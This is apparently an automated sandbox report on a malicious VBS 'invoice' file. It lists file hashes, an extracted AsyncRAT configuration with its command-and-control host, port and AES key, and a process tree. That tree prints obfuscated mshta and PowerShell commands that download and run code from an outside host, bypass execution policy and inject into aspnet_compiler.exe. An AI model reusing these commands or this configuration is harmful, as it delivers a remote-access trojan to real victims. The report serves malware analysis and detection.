Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
27-04-2021 15:14
Static task
static1
Behavioral task
behavioral1
Sample
invoice954423.vbs
Resource
win7v20210410
General
-
Target
invoice954423.vbs
-
Size
236B
-
MD5
755e0f945656b708f911ff7438ee3dda
-
SHA1
147e7d2fad41deea7b15801a815dd80c340ae9b2
-
SHA256
4622e0560aaa02a43009773a1c42f8017cae6b63f0f7950b358c22d46c757e1c
-
SHA512
3d6c7eab9ac8ecd9fc4b8ce2f22026444500c4fc6327c674e5298a0eb3ea23ac7e9b173c67cb4fa67ce223e2dfbd0f7b338e60d5d00320ebaf6ba969d2b5d00f
Malware Config
Extracted
asyncrat
0.5.7B
bad96.ddns.net:1996
AsyncMutex_6SI8OkPnk
-
aes_key
wV8wYBZRpKZKwS4P6oMapiOlrel4uoXW
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
bad96.ddns.net
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
1996
-
version
0.5.7B
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2332-181-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/2332-182-0x000000000040C70E-mapping.dmp asyncrat -
Blocklisted process makes network request 6 IoCs
Processes:
mshta.exepowershell.exeflow pid process 7 4024 mshta.exe 12 4024 mshta.exe 14 4024 mshta.exe 15 192 powershell.exe 21 192 powershell.exe 22 192 powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 424 set thread context of 2332 424 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 192 powershell.exe 192 powershell.exe 192 powershell.exe 424 powershell.exe 424 powershell.exe 424 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 192 powershell.exe Token: SeDebugPrivilege 424 powershell.exe -
Suspicious use of WriteProcessMemory 18 IoCs
Processes:
WScript.exemshta.exepowershell.execmd.exemshta.exepowershell.exedescription pid process target process PID 1032 wrote to memory of 4024 1032 WScript.exe mshta.exe PID 1032 wrote to memory of 4024 1032 WScript.exe mshta.exe PID 4024 wrote to memory of 192 4024 mshta.exe powershell.exe PID 4024 wrote to memory of 192 4024 mshta.exe powershell.exe PID 192 wrote to memory of 720 192 powershell.exe cmd.exe PID 192 wrote to memory of 720 192 powershell.exe cmd.exe PID 720 wrote to memory of 816 720 cmd.exe mshta.exe PID 720 wrote to memory of 816 720 cmd.exe mshta.exe PID 816 wrote to memory of 424 816 mshta.exe powershell.exe PID 816 wrote to memory of 424 816 mshta.exe powershell.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe PID 424 wrote to memory of 2332 424 powershell.exe aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\invoice954423.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" https://nyc002.hawkhost.com/~mazencom/neww/3.txt2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a1 = 'S&@&@&@&@&@&@m.N$%$%$%$%eb@!@!@!@!@!@!nt'.Replace('&@&@&@&@&@&@','yste').Replace('$%$%$%$%','et.W').Replace('@!@!@!@!@!@!','Clie');$a2b= '!!!!!!!!!!!wnl########tr*&*&*&*&*&'.Replace('!!!!!!!!!!!','Do').Replace('########','oads').Replace('*&*&*&*&*&','ing');$a3 = (New-Object $a1);$bb = I`E`X $a3.$a2b('https://nyc002.hawkhost.com/~mazencom/neww/2.txt') ;3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\chrome.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""p"+"ow"+"ersh"+"ell -Ex"+"ecuti"+"onPol"+"icy Bypa"+"ss & 'C"+":\Us"+"ers\P"+"ubl"+"ic\msi"+".ps1'"", 0:close")5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\msi.ps1'6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logMD5
ea6243fdb2bfcca2211884b0a21a0afc
SHA12eee5232ca6acc33c3e7de03900e890f4adf0f2f
SHA2565bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8
SHA512189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5
415731551acc036e1004f2ef257a0180
SHA107276d736deda6efaae21ea706ffd50ae95467a9
SHA256a78371e5bb6c5afce20db6248455fe5d60f04a3548af7eab651c25d966b5bbcd
SHA5127a132f6b9f244a55a00d02812463d476b1c64c423cd5b560f640fe3ecfb024ae73e5fa18a70d0d7eb7d91cc8f3dff8452a0ed0998aa7d80ce725c28f3e7da5f3
-
C:\Users\Public\chrome.batMD5
1151fa07f8501963f789e793d38a5938
SHA18831c4ba8773c88e006579a105295a39cf2d3c22
SHA256656b70e849a752e1f529a17ce27a897a1e3c8a383002c3b3d89c25eb34a67254
SHA51237035273ad0621422403e85535172814e87896e854676aaf40741ad701efd4892642987e9d3a2d070cba7e881d5eadd657174b46de6e6ec50380cc295a03bc7e
-
C:\Users\Public\msi.ps1MD5
63744b513e19eb511a7bb66870824cd0
SHA1073e681e42bc390b1ad076ac43932b593a8ff439
SHA2567db96ca84f97ade18337169368f3043cb8c00b7767c3f40b8ce503ecaa898edc
SHA5126262c3b64db8aabcd7cf4665887be5d29df5e1fa9875668e5ba3a1751689cfd31275ee61e1ba6bc5c68cc64e652271855a36701eee24c1291129d699e800cafd
-
memory/192-116-0x0000000000000000-mapping.dmp
-
memory/192-122-0x000002EA5A150000-0x000002EA5A151000-memory.dmpFilesize
4KB
-
memory/192-127-0x000002EA5A180000-0x000002EA5A182000-memory.dmpFilesize
8KB
-
memory/192-128-0x000002EA5A183000-0x000002EA5A185000-memory.dmpFilesize
8KB
-
memory/192-129-0x000002EA5AD60000-0x000002EA5AD61000-memory.dmpFilesize
4KB
-
memory/192-136-0x000002EA5A186000-0x000002EA5A188000-memory.dmpFilesize
8KB
-
memory/424-154-0x0000000000000000-mapping.dmp
-
memory/424-171-0x00000135C76C0000-0x00000135C76C2000-memory.dmpFilesize
8KB
-
memory/424-172-0x00000135C76C3000-0x00000135C76C5000-memory.dmpFilesize
8KB
-
memory/424-175-0x00000135C9110000-0x00000135C9128000-memory.dmpFilesize
96KB
-
memory/424-180-0x00000135C76C6000-0x00000135C76C8000-memory.dmpFilesize
8KB
-
memory/720-149-0x0000000000000000-mapping.dmp
-
memory/816-152-0x0000000000000000-mapping.dmp
-
memory/2332-181-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/2332-182-0x000000000040C70E-mapping.dmp
-
memory/2332-186-0x00000000053A0000-0x00000000053A1000-memory.dmpFilesize
4KB
-
memory/4024-114-0x0000000000000000-mapping.dmp